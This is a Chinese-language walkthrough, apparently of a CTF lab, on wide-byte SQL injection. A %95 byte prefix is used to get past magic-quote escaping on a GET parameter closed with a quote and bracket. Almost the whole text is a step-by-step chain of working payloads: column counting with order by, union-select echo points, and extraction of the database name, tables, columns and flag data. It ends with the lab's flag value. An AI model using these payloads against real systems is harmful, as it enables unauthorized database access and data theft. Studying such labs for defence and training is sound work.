【宽字节注入】（二）

发布于：2022-12-31 ⋅ 阅读:(377) ⋅ 点赞:(0)

宽字节注入（二）—>get单引号+括号传参

判断注入

判断有无显错注入发现有魔法引号，因此采用宽字节注入

%95") – qwe
发现宽字节注入有效

亦或者

判断方法

输入")报错，输入") – q正常运行

判断字段数

%95") order by 1 – qwe
order by 4时报错，order by 3之前都正常，因此有3个字段

判断回显点

%59") and 1=2 union select 1,2,3 – qwe

查当前库名

查询语句

%95") union select 1,2,database()-- qwe

查表名

查询语句
%95") and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema =database() – qwe’

查行名

查询语句

%95") and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = database() and table_name =(select table_name from information_schema.tables where table_schema = database() limit 0,1 ) – qwe

取数据

%95") and 1=2 union select 1,2,group_concat(C_Flag) from china_flag – qwe

提交flag

逐一尝试提交准确的flag即可；flag为zKaQ-CAIK